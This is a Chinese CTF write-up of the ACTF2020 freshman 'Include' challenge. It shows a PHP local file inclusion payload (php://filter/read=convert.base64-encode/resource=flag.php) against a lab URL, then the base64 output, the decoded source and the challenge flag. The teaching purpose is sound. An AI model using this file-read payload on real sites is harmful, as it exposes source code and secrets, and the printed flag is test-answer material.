第四篇笔记No.4(7)[ACTF2020 新生赛]Include 1

第四篇笔记No.4(7)[ACTF2020 新生赛]Include1

这道题的知识点是文件包含和php伪协议。靶场的链接是http://3511fd08-9f02-40df-b2c7-c391ba3f78bb.node3.buuoj.cn/
在链接之后加上/?file=php://filter/read=convert.base64-encode/resource=flag.php就可以得到flag了,下面我们一起进去看看做题流程,刚进去页面是这样的
在这里插入图片描述
进入后台
在这里插入图片描述
点了一下tips
在这里插入图片描述
看到显示 /?file=flag.php,可以用伪协议读flag.php,一般语句为php://filter/read=convert.base64-encode/resource=xxx
根据题目的具体情况,在链接之后加上
?file=php://filter/read=convert.base64-encode/resource=flag.php 得到http://3511fd08-9f02-40df-b2c7-c391ba3f78bb.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php
在这里插入图片描述
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NTg2NzU1NmYtNWE0NC00ZjRhLTgyOTMtNWEyZTQ2ODJlZDE3fQo= 从密文可以看出是Base64加密,
Base64解密链接
解密之后
在这里插入图片描述

<?php echo "Can you find out the flag?"; //flag{5867556f-5a44-4f4a-8293-5a2e4682ed17} > 把flag复制进去之后就完成了,加油!!!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值